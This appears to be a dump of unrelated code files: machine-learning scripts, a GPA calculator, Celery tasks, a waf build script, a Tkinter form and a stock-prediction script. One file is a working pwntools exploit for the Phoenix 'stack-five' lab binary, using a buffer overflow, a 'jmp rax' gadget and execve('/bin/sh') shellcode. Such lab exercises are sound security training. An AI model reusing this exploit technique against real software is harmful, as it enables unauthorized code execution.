traindata = traindata.drop(corr_cols, axis=1)
testdata = testdata.drop(corr_cols, axis=1)
# imputing missing values with 0 (left-merges above introduce NaNs for users
# absent from the transaction/log files)
traindata = traindata.fillna(0)
testdata = testdata.fillna(0)
# Creating train and test variables (features vs. the is_churn target).
train_y=traindata['is_churn']
featuresdata= traindata.drop('is_churn',1)
train_x=featuresdata
test_y=testdata['is_churn']
testfeaturesdata= testdata.drop('is_churn',1)
test_x=testfeaturesdata
# Building the RandomForest model (100 trees, all cores).
trained_model = RandomForestClassifier(n_estimators=100,n_jobs=-1)
# The id column 'msno' is excluded from the feature matrix at fit/predict time.
trained_model.fit(train_x.drop('msno',axis=1), train_y)
# Getting predictions for the test set from the fitted model.
predictions = trained_model.predict(test_x.drop('msno',axis=1))
# Printing the train and test accuracy.
print ("Train Accuracy :: ", accuracy_score(train_y, trained_model.predict(train_x.drop('msno',axis=1))))
print ("Test Accuracy :: ", accuracy_score(test_y, predictions))
from collections import OrderedDict
prediction_df = pd.DataFrame(OrderedDict([ ("msno", test_x["msno"]), ("is_churn", predictions) ]))
# Exporting hard-label predictions to a csv file.
prediction_df.to_csv("prediction_split.csv", index=False)
# Test-set prediction probabilities, kept for log-loss and later ensembling.
predictionsprob = trained_model.predict_proba(test_x.drop('msno',axis=1))
# Column 1 is the probability of the positive (churn) class.
secondpred= [item[1] for item in predictionsprob]
predictionProbdf = pd.DataFrame(OrderedDict([ ("msno", test_x["msno"]), ("is_churn", secondpred)]))
# Exporting test-set probabilities to a csv file.
predictionProbdf.to_csv("predictionTestProb_split.csv", index=False)
# Train-set prediction probabilities, for log-loss and later ensembling.
predictionsTrainprob = trained_model.predict_proba(train_x.drop('msno',axis=1))
predTrain=trained_model.predict(train_x.drop('msno',axis=1))
secondTrainpred= [itemt[1] for itemt in predictionsTrainprob]
predictionTrainProbdf = pd.DataFrame(OrderedDict([ ("msno", train_x["msno"]), ("is_churn", secondTrainpred)]))
# Exporting train-set probabilities to a csv file.
predictionTrainProbdf.to_csv("predictionTrainProb_split.csv", index=False)
# NOTE(review): `labels` here names the dataframe columns, but log_loss
# expects class labels -- confirm this argument is doing what was intended.
scoreTest = log_loss(test_y, predictionsprob,labels=["msno","is_churn"])
print(scoreTest)
# Log loss on the training set for the same model.
scoreTrain = log_loss(train_y, predictionsTrainprob,labels=["msno","is_churn"])
print(scoreTrain)
# Feature-importance data from the fitted forest, mapped back to column names.
importances=trained_model.feature_importances_
indices = np.argsort(importances)[::-1]
trainlabels=list(train_x.columns.drop('msno',1))
importanceList=np.array((importances)).tolist()
featureList={}
for i in range(len(trainlabels)):
    featureList[trainlabels[i]] = importanceList[i]
# Getting top ten features as per feature importance generated above.
# BUG FIX: dict.values() returns a view in Python 3, which has no .sort();
# use sorted() instead of the old Python 2 list-then-sort idiom.
vallist = sorted(featureList.values())
import operator
sorted_d = sorted(featureList.items(), key=operator.itemgetter(1), reverse=True)
# Plotting feature importance data for the Random Forest model built above.
plt.figure()
plt.rcParams['figure.figsize'] = 17, 12
plt.title("Feature importances")
plt.yticks(range(train_x.shape[1]-1), train_x.columns.drop('msno', 1))
plt.barh(indices, importances[indices],
         color="b", align="center")
# NOTE(review): xlim normally takes (left, right); confirm this
# single-element form is intended.
plt.xlim([-1, ])
plt.xlabel('Features importance score')
plt.show()
|
15,713 | 7e8764d79ce9c03130231ba7bb1c98c1c5ebed18 | from pwn import *
# Distance from the start of the vulnerable buffer to the saved return address.
bufsize = 136
# 0x0000000000400481: jmp rax;  (gadget: rax points at the buffer on return)
rop = p64(0x0000000000400481)
# x86-64 shellcode: execve("/bin/sh", 0, 0) via syscall 59; the trailing
# "/bin/sh\0" is addressed rip-relative by the lea at offset 10.
shellcode = '\xba\x00\x00\x00\x00\xbe\x00\x00\x00\x00H\x8d=\x07\x00\x00\x00\xb8;\x00\x00\x00\x0f\x05/bin/sh\x00'
# NOP sled + shellcode fills the buffer; the gadget address overwrites RIP.
# NOTE(review): p64 returns bytes under Python 3, so str + bytes here would
# raise TypeError -- this script presumably targets Python 2; confirm.
payload = "\x90" * (bufsize - len(shellcode)) + shellcode + rop
r = process("/opt/phoenix/amd64/stack-five")
r.recvuntil("\n")
r.sendline(payload)
r.interactive()
|
15,714 | b188b9d221b80d68e2c0a1836c5834143c3056dc | # Muhammad Ibrahim (mi2ye)
# Compute the socially acceptable dating range ("half your age plus seven").
age = int(input('How old are you? '))
if age % 2:
    # odd ages: round down before halving
    low = (age - 1) / 2 + 7
else:
    low = age / 2 + 7
high = age * 2 - 13
print('You can date people between', int(low), 'and', high, 'years old')
|
15,715 | eed59b1966fe4d9f38d688a68bd32fe43343c6d6 | #Joel Feddes
#This program will determine your GPA, credit hours, and quality points per semester. Also, it will tell you what your final quality points, credit hours, and gpa is.
#This program will also tell you if you finished with honors overall, or if you were on the dean's list for a particular semester.
''' gpa is calculated by summing up the quality points of every course you took and then divided by the number of credit hours.
The quality points of a course is the number of credit hours multiplied by the grade numbers (an A is equal to 4).
So if I got an A in this course, I would gain 12 quality points
'''
def report_welcome():
    """Print the banner for the grade report tool."""
    border = "*" * 65
    print(border)
    print("Grade Report Tool".center(65))
    print(border)
def find_quality_points_for_course(letter_grade, credit_hours):
    """Return the quality points a course contributes: grade value x credits.

    letter_grade -- letter grade string, e.g. "A", "B+", "C-"
    credit_hours -- number of credit hours for the course
    Unknown grades (including "F") are worth 0 points, matching the
    original if/elif ladder's final else branch.
    """
    # Standard 4.0-scale grade table; a dict lookup replaces the 12-branch
    # if/elif chain with identical values.
    grade_table = {
        "A": 4, "A-": 3.7,
        "B+": 3.3, "B": 3, "B-": 2.7,
        "C+": 2.3, "C": 2, "C-": 1.7,
        "D+": 1.3, "D": 1, "D-": 0.7,
    }
    points = grade_table.get(letter_grade, 0)
    return points * credit_hours
#main
report_welcome()
fname = input("\nEnter the name of your GPA file: ")
fvar = open(fname, "r")
# Per-semester accumulators; reset every time a semester header line is seen.
semester_gpa = 0       # GPA for the current semester
semester_hours = 0     # credit hours earned in the current semester
semester_q_points = 0  # quality points earned in the current semester
# Cumulative totals across all semesters read so far.
total_gpa = 0
total_hours = 0
total_q_points = 0
print("\nHere is your grade summary:\n ")
print("%-15s%10s%10s%10s%20s" % ("Semester", "Hours", "Points", "GPA", "Standing"))
print("-" * 65)
for line in fvar:
    line = line.strip()
    # A blank line closes the current semester: print its summary row
    # (flagging DEAN'S LIST when the semester GPA is at least 3.5) and
    # fold its numbers into the cumulative totals.
    if line == "" and semester_gpa >= 3.5:
        print("%-15s%10d%10.2f%10.2f%20s" % (semester,semester_hours,semester_q_points,semester_gpa, "DEAN'S LIST"))
        total_hours = total_hours + semester_hours
        total_q_points = total_q_points + semester_q_points
        total_gpa = total_q_points / total_hours
    elif line == "" and semester_gpa < 3.5:
        print("%-15s%10d%10.2f%10.2f" % (semester,semester_hours,semester_q_points,semester_gpa))
        total_hours = total_hours + semester_hours
        total_q_points = total_q_points + semester_q_points
        total_gpa = total_q_points / total_hours
    else:
        # Tab-separated data line: 2 fields = semester header, 4+ = course row.
        parts = line.split("\t")
        if len(parts) == 2:
            # Semester header at parts[1]; reset the per-semester accumulators.
            semester = parts[1].upper()
            semester_gpa = 0
            semester_hours = 0
            semester_q_points = 0
        else:
            # Course row: number, name, credit hours, letter grade.
            num_course = parts[0]
            course_name = parts[1]
            hours = int(parts[2])
            letter_grade = parts[3]
            q_points = find_quality_points_for_course(letter_grade,hours)
            semester_hours = semester_hours + hours
            semester_q_points = semester_q_points + q_points
            semester_gpa = semester_q_points / semester_hours
# Flush the last semester (the file need not end with a blank line).
# NOTE(review): if the file DOES end with a blank line, the final semester is
# counted twice (once in the loop, once here) -- confirm the input format.
if semester_gpa >= 3.5:
    total_hours = total_hours + semester_hours
    total_q_points = total_q_points + semester_q_points
    total_gpa = total_q_points / total_hours
    print("%-15s%10d%10.2f%10.2f%20s" % (semester,semester_hours,semester_q_points,semester_gpa, "DEAN'S LIST"))
else:
    total_hours = total_hours + semester_hours
    total_q_points = total_q_points + semester_q_points
    total_gpa = total_q_points / total_hours
    print("%-15s%10d%10.2f%10.2f" % (semester,semester_hours,semester_q_points,semester_gpa))
print("-" * 65)
# Cumulative row; HONORS when the overall GPA is at least 3.5.
if total_gpa >= 3.5:
    print("%-15s%10d%10.2f%10.2f%20s" % ("Cumulative",total_hours,total_q_points,total_gpa,"HONORS"))
else:
    print("%-15s%10d%10.2f%10.2f" % ("Cumulative",total_hours,total_q_points,total_gpa))
input("\nPress enter to exit program")
fvar.close()
|
15,716 | c9ad5cbc6f9d75e9930c3e52448af2226a9f82ae | ## Create your tasks here
from __future__ import absolute_import, unicode_literals
from celery import shared_task
from settings import SHORT, EXCHANGE_MARKETS
from taskapp.celery import app as celery_app
## Periodic tasks
@celery_app.task(retry=False)
def compute_and_save_indicators_for_all_sources(resample_period):
    """Fan out one async indicator-computation task per known exchange."""
    # Imported lazily so the worker does not pull helpers at module load.
    from taskapp.helpers import get_exchanges
    for exchange in get_exchanges():
        compute_and_save_indicators.delay(source=exchange, resample_period=resample_period)
@celery_app.task(retry=False)
def compute_and_save_indicators(source, resample_period):
    """Compute and persist indicators for one exchange at one resample period."""
    from taskapp.helpers import _compute_and_save_indicators
    _compute_and_save_indicators(source=source, resample_period=resample_period)
@shared_task
def precache_info_bot():
    """Warm the info-bot's currency-info cache."""
    from apps.info_bot.helpers import precache_currency_info_for_info_bot
    precache_currency_info_for_info_bot()
## Debug Tasks
# @shared_task
# def calculate_one_pair(resample_period=SHORT, transaction_currency='BTC', counter_currency = 2):
# from taskapp.helpers import _calculate_one_par
# import time
# timestamp=time.time()
# logger = logging.getLogger(__name__)
# _calculate_one_par(timestamp=timestamp, resample_period=resample_period, \
# transaction_currency=transaction_currency, counter_currency = counter_currency)
|
15,717 | e33aeff683f917031af70c5d1090396545d216f2 | import Options
import Environment
import sys, os, shutil, glob
from os import unlink, symlink, popen
from os.path import join, dirname, abspath, normpath
srcdir = '.'
blddir = 'build'
VERSION = '0.5.0'
def set_options(opt):
    """waf option hook: register compiler tools and a --clearsilver prefix flag."""
    opt.tool_options('compiler_cxx')
    opt.tool_options('compiler_cc')
    opt.tool_options('misc')
    # Optional install prefix of a ClearSilver build (adds -I/-L paths in configure).
    opt.add_option( '--clearsilver'
                  , action='store'
                  , type='string'
                  , default=False
                  , help='clearsilver install'
                  , dest='clearsilver'
                  )
def configure(conf):
    """waf configure: locate C/C++ compilers, node headers and ClearSilver libs."""
    conf.check_tool('compiler_cxx')
    if not conf.env.CXX: conf.fatal('c++ compiler not found')
    conf.check_tool('compiler_cc')
    if not conf.env.CC: conf.fatal('c compiler not found')
    conf.check_tool('node_addon')
    o = Options.options
    # If a ClearSilver prefix was given, point the compiler/linker at it.
    if o.clearsilver:
        conf.env.append_value("CPPFLAGS", '-I%s/include' % o.clearsilver)
        conf.env.append_value("CPPFLAGS", '-I%s/include/ClearSilver' % o.clearsilver)
        conf.env.append_value("LINKFLAGS", '-L%s/lib' % o.clearsilver)
    # print conf.env
    # check ClearSilver libs
    conf.check_cc( lib='neo_cs', mandatory=True )
    conf.check_cc( lib='neo_utl', mandatory=True )
    conf.check_cc( lib='neo_cgi', mandatory=True )
    conf.check_cc( lib='pthread', mandatory=True )
def build(bld):
    """waf build: compile the ClearSilver node addon as a shared library."""
    # print 'build'
    t = bld.new_task_gen('cxx', 'shlib', 'node_addon')
    t.target = 'ClearSilver'
    t.source = './src/clearsilver.cc'
    t.includes = ['.']
    t.lib = ['neo_cs','neo_cgi','neo_utl','pthread']
def shutdown(ctx):
    """waf shutdown hook; nothing to clean up."""
    pass
|
15,718 | 12d22cfa3d9332b0a73dbc55eff4279a705127ac | from annar4Interface import *
from annarProtoRecv import *
from annarProtoSend import *
from MsgObject_pb2 import *
|
15,719 | c89940ab8f33c890a41e56f998fd50f4a4d4e3f9 | # -*- coding: utf-8 -*-
import scrapy
class Cd05shuangseqiuSpider(scrapy.Spider):
    """Crawl historical shuangseqiu (double-color-ball) lottery draws from
    kaijiang.zhcw.com, yielding one dict per draw and paging until the end."""
    name = 'cd_05shuangseqiu'
    allowed_domains = ['kaijiang.zhcw.com']
    # Fixed: the query string had been HTML-entity-mangled ("&curren" rendered
    # as the currency sign), which silently dropped the currentPageNum
    # parameter.  The intact URL in parse()'s sample comment confirms the
    # correct form.
    start_urls = [
        'http://kaijiang.zhcw.com/lishishuju/jsp/ssqInfoList.jsp?czId=1&beginIssue=2003001&endIssue=2019160&currentPageNum=1']

    def parse(self, response):
        """Extract draw number, six red balls and the blue ball for each row,
        then follow the next-page link until the URL stops changing."""
        qihaos = response.xpath("//tbody/tr/td[3]/text()").extract()  # draw numbers
        lanqius = response.xpath("//tbody/tr/td[4]/span/text()").extract()  # blue winning numbers
        # hongses = response.xpath("//tbody/tr/td[4]/text()").extract()  # red winning numbers
        # Red balls: split each draw's cell into tokens, dropping the trailing one.
        hongqius = [hongse.split(" ")[0:-1] for hongse in response.xpath("//tbody/tr/td[4]/text()").extract()]
        # print(qihaos,hongqius,lanqius)
        # Combine draw number, red balls and blue ball into one dict per draw.
        for index in range(len(qihaos)):
            ssq_dict = {
                "qihao": qihaos[index],
                # hongqius[index] is the list of red balls drawn that period;
                # lstrip('0') normalizes "05" -> "5".
                "redOne": hongqius[index][0].lstrip('0'),
                "redTwo": hongqius[index][1].lstrip('0'),
                "redThree": hongqius[index][2].lstrip('0'),
                "redFour": hongqius[index][3].lstrip('0'),
                "redFive": hongqius[index][4].lstrip('0'),
                "redSix": hongqius[index][5].lstrip('0'),
                "blueSeven": lanqius[index].lstrip('0'),
            }
            yield ssq_dict
        # Relative next-page URL, e.g.
        # ssqInfoList.jsp?czId=1&beginIssue=2003001&endIssue=2019160&currentPageNum=7
        next_url = response.xpath('//div[@class="container"]/div[4]/a[3]/@href').extract_first().rstrip()
        # Resolve it against the current page.
        url = response.urljoin(next_url)
        print(url)
        if url != response.url:
            # Keep crawling until the "next" link points back at this page.
            yield scrapy.Request(url, callback=self.parse)
|
15,720 | 6291812f3643e26b4b526cb570f731d1c72ae857 | from tkinter import *
from db_class import Profile
window = Tk()
window.geometry("500x500")
path = "Profiles.sql"
def signup():
    """Read the registration form fields and store a new profile.

    NOTE(review): the new ID is derived from the current profile count, which
    can collide if rows are ever deleted -- confirm against db_class.Profile.
    """
    profile = Profile(path)
    firstname = entryname.get()
    surename = entrysurename.get()
    email = entryemail.get()
    password = entrypass.get()
    new_ID = profile.get_count_of_profiles() + 1
    profile.registration(new_ID, firstname, surename, email, password)
    # profile.create_table()
    profile.get_all_profiles()
# --- Registration form layout: labels on the left, entry widgets on the right ---
# NOTE(review): "Registrtion" is a user-visible typo; left unchanged because it
# is runtime text, not a comment.
label1 = Label(window, text="Registrtion")
label1.place(x=175, y=10)
labelname = Label(window, text="Firstname: ")
labelname.place(x=20, y=40)
entryname = Entry(window)
entryname.place(x=300, y=40)
lblsurename = Label(window, text="Surename: ")
lblsurename.place(x=20, y=80)
entrysurename = Entry(window)
entrysurename.place(x=300, y=80)
labelemail = Label(window, text="Email: ")
labelemail.place(x=20, y=120)
entryemail = Entry(window)
entryemail.place(x=300, y=120)
lblpass = Label(window, text="Password: ")
lblpass.place(x=20, y=160)
entrypass = Entry(window)
entrypass.place(x=300, y=160)
# The Create button triggers signup() above.
btn = Button(window, text="Create", command=signup)
btn.place(x=175, y=200)
window.mainloop()
def checkeven(val):
    """Return True if *val* is even, else False."""
    # The comparison already produces the bool; no if/else branching needed.
    return val % 2 == 0
def checkodd(val):
    """Return True if *val* is odd, else False."""
    # Direct boolean expression replaces the if/else returning literals.
    return val % 2 != 0
# Prompt for which parity to test, read the number, and print the result.
choice=int(input("Tell whether you want to check even or odd\n1.even\n2.odd\n"))
num=int(input("Enter number to check: "))
if choice==1:
    result_even=checkeven(num)
    print(result_even)
elif choice==2:
    result_odd=checkodd(num)
    print(result_odd)
# Print the first character of each hyphen-separated token, with no separator
# (e.g. "one-two-three" -> "ott").
for s in input().split("-"):
    print(s[0], end='')
|
15,723 | 6f9f49cfed352478bece0a5f23065fac13abeadc | import tushare as ts
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from sklearn.ensemble import AdaBoostRegressor
import matplotlib.pyplot as plt
import matplotlib
matplotlib.rc('font', family='SimSun') #用来正常显示中文标签
plt.rcParams['axes.unicode_minus']=False #用来正常显示负号
from sklearn.decomposition import PCA
pd.set_option('display.max_columns', None)
count_row = -1
count_col = -1
value_count_row = 400
test_num = 100
number_of_day_before = 1
point = 0.02
base_point = 1
stock_list = ['000001','000049', '000338', '000002', '000520', '000537', '000540', '000568', '000629', '000636', '000651', '000661']
def timing(stock_code, split_point):
    """Backtest a next-day-return predictor for one stock.

    Pulls daily history via tushare, trains an AdaBoost regressor on the
    older rows, predicts returns for the most recent `test_num` rows, then
    plots the equity curves and the implied buy/sell points.
    NOTE(review): `split_point` is accepted but never used -- confirm intent.
    """
    x_train = []
    temp_x_train = []
    y_train = []
    x_test = []
    temp_x_test = []
    y_test = []
    df = ts.get_hist_data(stock_code)
    # Sentinel values: -2 means no data at all, -1 means data present.
    if df is None:
        count_row = -2
    else:
        count_row = -1
    if count_row > -2:
        (count_row, count_col) = df.shape
        # Only backtest when enough history exists (value_count_row rows).
        if count_row > value_count_row:
            base_point = df.iloc[count_row - 1, 2]
            # Label column: relative change of column 2 over
            # `number_of_day_before` trading days (newest rows come first).
            df['return'] = np.nan
            for i in range(number_of_day_before, count_row):
                df.iloc[i, 13] = (df.iloc[i - number_of_day_before, 2] - df.iloc[i, 2]) / df.iloc[i, 2]
            '''
            data = df[test_num : count_row]
            print (data)
            '''
            ###################################################
            # Training rows: everything older than the test window, walked
            # oldest-first so samples are in chronological order.
            for i in range(count_row - 1, test_num - 1, -1):
                for j in range(0, count_col):
                    temp_x_train.append(df.iloc[i, j])
                x_train.append(temp_x_train)
                temp_x_train = []
                y_train.append(df.iloc[i, count_col])
            print (x_train)
            MinMax = MinMaxScaler()
            x_train = MinMax.fit_transform(x_train)
            ###################################################
            # Test rows: the most recent `test_num` trading days, scaled with
            # the scaler fitted on the training rows.
            for i in range(test_num - 1, number_of_day_before - 1, -1):
                for j in range(0, count_col):
                    temp_x_test.append(df.iloc[i, j])
                x_test.append(temp_x_test)
                temp_x_test = []
                y_test.append(df.iloc[i, count_col])
            x_test = MinMax.transform(x_test)
            ###################################################
            # Reduce features to 5 principal components.
            estimator = PCA(n_components=5)
            x_train = estimator.fit_transform(x_train)
            x_test = estimator.transform(x_test)
            ###################################################
            #model = SVC(C = 1.0, kernel = 'rbf', class_weight = {-1: 4, 0: 1, 1: 4})
            #model = SVR(kernel='rbf', C=1000)
            #model = RandomForestRegressor(n_estimators=50)
            model = AdaBoostRegressor()
            model.fit(x_train, y_train)
            y_predict = model.predict(x_test)
            print ('*****************************')
            print (stock_code)
            print ('y_test')
            print (y_test)
            print ('y_predict')
            print (y_predict)
            # Compound per-day returns into equity curves starting at base_point.
            time_length = len(y_test)
            sum_test = np.zeros(time_length)
            sum_predict = np.zeros(time_length)
            sum_test[0] = base_point * (1 + y_test[0])
            sum_predict[0] = base_point * (1 + y_predict[0])
            for i in range(1, time_length):
                sum_test[i] = sum_test[i - 1] * (1 + y_test[i])
                sum_predict[i] = sum_predict[i - 1] * (1 + y_predict[i])
            fig,ax = plt.subplots()
            index = range(0, time_length)
            plt.plot(index, sum_test, "x-", label = "test")
            plt.plot(index, sum_predict, "+-", label = "predict")
            # Mark the buy point (predicted minimum, red) and the sell point
            # (predicted maximum, green) with vertical lines.
            pre_min = min(sum_predict)
            pre_max = max(sum_predict)
            minindex = np.where(sum_predict == pre_min)[0][0]
            maxindex = np.where(sum_predict == pre_max)[0][0]
            plt.axvline(x=minindex, c = 'r')
            plt.axvline(x=maxindex, c='g')
            # Draw the straight line from the buy point to the sell point and
            # compute the realized return on the actual (test) curve.
            if minindex < maxindex:
                plt.plot([minindex, maxindex], [sum_test[minindex], sum_test[maxindex]], color='b', marker='o')
                profit_prt = cal_percent(sum_test[minindex], sum_test[maxindex])
                plt.title('股票:{3} 第{0}日买入,第{1}日卖出,回测收益率{2}'.format(minindex, maxindex, profit_prt, stock_code))
            else:
                # Predicted to fall: holding is not recommended.
                plt.title('预测下跌,不推荐持仓')
            plt.legend(bbox_to_anchor=(0.23, 0.97), loc=1, borderaxespad=0.)
            plt.show()
def cal_percent(buy_price, sell_price):
    """Format the fractional return of buying at *buy_price* and selling at
    *sell_price* as a whole-percent string, e.g. '50%'."""
    ratio = np.round(sell_price / buy_price - 1, 2)
    return '{0:.0f}%'.format(ratio * 100)
def timing_package(stock_list):
    """Run the timing() backtest for every stock code in *stock_list*."""
    for i_stock in stock_list:
        #code = '%06d' % i_stock
        #print (code)
        timing(i_stock, 0)
|
15,724 | cdc14840f9f38fe28bee9bea0b5f5907cec0edac | __all__ = ['RF']
import plotly.graph_objects as go
import math
import sys
class Resource_fig():
    """Estimates FPGA resource usage (LUT counts and 18Kb BRAM counts) for a
    monitor configuration and renders the estimates as plotly figures.

    Configuration: LUT type ('3'/'4'/'6' inputs), total SCQ size, and the
    target timestamp width in bits."""

    def __init__(self, LUT_type, scq_size, target_timestamp):
        # NOTE(review): on an invalid LUT_type this returns early and leaves
        # the instance without attributes -- later method calls would fail.
        if (LUT_type not in ('3', '4', '6')):
            print("Error in selecting LUT type.")
            return
        self.LUT_type = LUT_type       # LUT input count as a string
        self.tot_scq = scq_size        # total SCQ entries
        self.tts = target_timestamp    # target timestamp width (bits)
        self.fig1 = go.Figure()        # LUT-count figure
        self.fig2 = go.Figure()        # BRAM-count figure

    def config(self, LUT_type, scq_size, target_timestamp):
        """Re-point the figure generators at a new configuration."""
        self.LUT_type = LUT_type
        self.tot_scq = scq_size
        self.tts = target_timestamp

    def gen_comparator(self, width,k):
        """LUTs for one `width`-bit comparator built from k-input LUTs (-1 if k unknown)."""
        if(k==3):
            return 4*width+1
        if(k==4):
            return 2*width+1
        elif(k==6):
            return width+1
        return -1

    def gen_adder(self, width,k):
        """LUTs for one `width`-bit adder/subtractor built from k-input LUTs (-1 if k unknown)."""
        if(k==6):
            return width
        elif(k==4):
            return width*2
        elif(k==3):
            return width*2
        else:
            return -1

    def gen_LUT_fig(self):
        """Rebuild fig1: total LUT count vs timestamp width around the target width."""
        self.fig1 = go.Figure()
        # Sweep widths from 40 below to 30 above the target timestamp width.
        st = max(self.tts-40, 0)
        ed = self.tts+30
        x = list(range(st, ed, 1))
        y_3,y_4,y_6=[],[],[]
        z_3,z_4,z_6=[],[],[]
        tot_comp = 33   # total comparators in the design
        tot_add = 32    # total adder/subtractors in the design
        for data in x:
            y_3.append(self.gen_comparator(data,3)*tot_comp)
            y_4.append(self.gen_comparator(data,4)*tot_comp)
            y_6.append(self.gen_comparator(data,6)*tot_comp)
            z_3.append(self.gen_adder(data,3)*tot_add)
            z_4.append(self.gen_adder(data,4)*tot_add)
            z_6.append(self.gen_adder(data,6)*tot_add)
        # Pick the series matching the configured LUT type.
        y_1, y_2, name_1, name_2 = [],[],"",""
        if (self.LUT_type=='3'):
            y_1, y_2 = y_3, z_3
            name_1 = "Number of LUT-3 for all Comparators"
            name_2 = "Number of LUT-3 for all Adder/Subtractors"
        elif (self.LUT_type=='4'):
            y_1, y_2 = y_4, z_4
            name_1 = "Number of LUT-4 for all Comparators"
            name_2 = "Number of LUT-4 for all Adder/Subtractors"
        else:
            y_1, y_2 = y_6, z_6
            name_1 = "Number of LUT-6 for all Comparators"
            name_2 = "Number of LUT-6 for all Adder/Subtractors"
        self.fig1.update_layout(title='Number of LUTs',
                   xaxis_title='Timestamp Width (bits)',
                   yaxis_title='Future-Time Number of LUTs')
        # dash options include 'dash', 'dot', and 'dashdot'
        self.fig1.add_trace(go.Scatter(x=x, y=y_1, name=name_1,
                     line=dict(color='firebrick', width=4)))
        self.fig1.add_trace(go.Scatter(x=x, y=y_2, name = name_2,
                     line=dict(color='royalblue', width=4)))
        # Vertical marker at the currently configured timestamp width.
        self.fig1.add_trace(go.Scatter(x=[self.tts, self.tts],y=[y_1[self.tts-st], y_2[self.tts-st]],
                     name = "Current Configuration", line = dict(width=0),
                     line_shape = 'vhv'))

    def gen_BRAM_fig(self):
        """Rebuild fig2: 18Kb BRAM count vs timestamp width around the target width."""
        self.fig2 = go.Figure()
        # Entry width (bits) -> depth (entries) of one 18Kb BRAM primitive.
        dep_tab = {1:16384,2:8192,4:4096,9:2048,18:1024,36:256}
        def gen_bram(nt,width):
            # BRAMs needed to store `nt` entries of `width` bits: pick the
            # narrowest primitive width that fits; widths over 36 bits use
            # full 36-bit slices plus one slice for the remainder.
            if(width<=36):
                cand = sys.maxsize # 88
                for key, value in dep_tab.items():
                    if(key>=width):
                        cand = min(cand,key)
                        break
                return math.ceil(nt/dep_tab[cand])
            else:
                cand = sys.maxsize #88
                for key, value in dep_tab.items():
                    if(key>=width%36):
                        cand = min(cand,key)
                        break
                return math.ceil(nt/dep_tab[36])*(width//36)+math.ceil(nt/dep_tab[cand])
        st = max(self.tts-40, 0)
        ed = self.tts+30
        x = list(range(st, ed, 1))
        y = []
        for width in x:
            # Fixed overhead BRAMs; one more is needed past 36-bit widths.
            extra = 5+1
            if(width>36):
                extra = 6+1
            # y.append(gen_bram(self.tot_scq ,width)+extra)
            y.append(gen_bram(self.tot_scq, width)+extra)
        self.fig2.update_layout(title='Number of 18Kb BRAMs',
                   xaxis_title='Timestamp Width (bits)',
                   yaxis_title='Number of 18Kb BRAMs')
        self.fig2.add_trace(go.Scatter(x=x, y=y,
                     line=dict(color='orange', width=4)))
        # Marker at the currently configured timestamp width.
        self.fig2.add_trace(go.Scatter(x=[self.tts,], y=[y[self.tts-st],], name = "Current Configuration",
                     line=dict(color='purple', width=0), line_shape = 'vhv'))

    def get_LUT_fig(self):
        """Regenerate and return the LUT figure."""
        self.gen_LUT_fig()
        return self.fig1

    def get_BRAM_fig(self):
        """Regenerate and return the BRAM figure."""
        self.gen_BRAM_fig()
        return self.fig2
RF = Resource_fig('3', 100, 32) |
15,725 | a60602c3d28117c66530e72914ffcf3c50e2d82b | import cronjob
@cronjobapp.register
def periodic_task():
    """Registered periodic hook.

    NOTE(review): `cronjobapp` is not defined in this module -- only
    `cronjob` is imported above; confirm the intended decorator source.
    """
    print('ishwar...')
def my_cron_job():
    """Print a greeting and write a marker value to the hard-coded file."""
    print('hello ishwar')
    # Context manager guarantees the file is closed even if the write raises,
    # replacing the manual open()/close() pair.
    with open('/home/ishwar/Desktop/cronjobpro/cronjobapp/file.txt', 'w+') as f:
        f.write('ishwar')
|
15,726 | 1f652275445d8625a1825d890ab953b9f7148822 | from django.db import models
# Create your models here.
class Disease(models.Model):
    """A disease with its code and the department responsible for it."""
    code = models.CharField(max_length=255)
    name = models.CharField(max_length=255)
    depart = models.CharField(max_length=255) #choices = []  (department; a choices list was considered)
class Symptom(models.Model):
    """A symptom identified by a code and a display name."""
    code = models.CharField(max_length=255)
    name = models.CharField(max_length=255)
class Symp_Ill(models.Model):
    '''
    Join table implementing the many-to-many relationship between
    Disease and Symptom (a disease's symptoms / a symptom's diseases).
    '''
    # related_name='symps' lets a Disease reach its symptom links; DO_NOTHING
    # leaves rows dangling on delete.
    Ill = models.ForeignKey(Disease, on_delete=models.DO_NOTHING, related_name='symps')
    Symp = models.ForeignKey(Symptom, on_delete=models.DO_NOTHING, related_name='ills')
|
15,727 | e08d9e5df77cf664cacc31760351013c02c03e0f | n = int(input())
numbers =[]
# numbers = [int(input() for _ in range(n))] # 아래와 같지만 컴프리헨션으로 구현
for _ in range(n):
numbers.append(int(input()))
sor = sorted(numbers, reverse=True)
for i in range(n):
print(sor[i], end=' ') |
15,728 | 73e1ec500b23e9dcc061ec5516e6c8f7a9fa8e98 | from django.urls import path
from .views import OrderAPIView, MyOrderAPIView
# Routes for the orders API: order list/create and the current user's orders.
urlpatterns = [
    path('order/', OrderAPIView.as_view(), name='orders'),
    path('my-orders/', MyOrderAPIView.as_view(), name='my-orders'),
]
|
15,729 | 58a641a34914c4c5d141928389bd18a801e4102c | import shutil
import numpy as np
import torch
import torch.nn as nn
import torch.functional as tf
import torch.utils.data
import time
from tqdm import tqdm
import model_denoise_clouds as model
import argparse
try:
import nvidia_smi
NVIDIA_SMI = True
except:
NVIDIA_SMI = False
import sys
import os
import pathlib
import zarr
class Dataset(torch.utils.data.Dataset):
    """
    Dataset class that will provide data during training. Modify it accordingly
    for your dataset. This one shows how to do augmenting during training for a
    very simple training set
    """
    def __init__(self, n_training):
        """
        Args:
            n_training (int): number of training examples including augmenting
        """
        super(Dataset, self).__init__()
        self.n_training = n_training
        # Measurement matrices and their largest eigenvalues (used for the step size).
        f_matrix = zarr.open('training_matrices.zarr', 'r')
        self.matrix = f_matrix['matrix'][:]
        self.eigenvals = f_matrix['largest_eval'][:]
        n_samples_matrix, _, _ = self.matrix.shape
        # Synthetic surfaces, stored inverted on disk; flip back with 1 - x.
        f_surface = zarr.open('training_surfaces_libnoise.zarr', 'r')
        self.surface = 1.0 - f_surface['surface'][:]
        n_samples_surface, _ = self.surface.shape
        f_clouds = zarr.open('training_clouds.zarr', 'r')
        self.clouds = f_clouds['clouds'][:]
        n_samples_clouds, _ = self.clouds.shape
        # Random pairings of matrix/surface/clouds define the virtual samples
        # (5 cloud maps per sample).
        self.index_matrix = np.random.randint(low=0, high=n_samples_matrix, size=self.n_training)
        self.index_surface = np.random.randint(low=0, high=n_samples_surface, size=self.n_training)
        self.index_clouds = np.random.randint(low=0, high=n_samples_clouds, size=(5, self.n_training))

    def __getitem__(self, index):
        """Assemble one synthetic observation: (Phi_split, surface, clouds, rho, d_split)."""
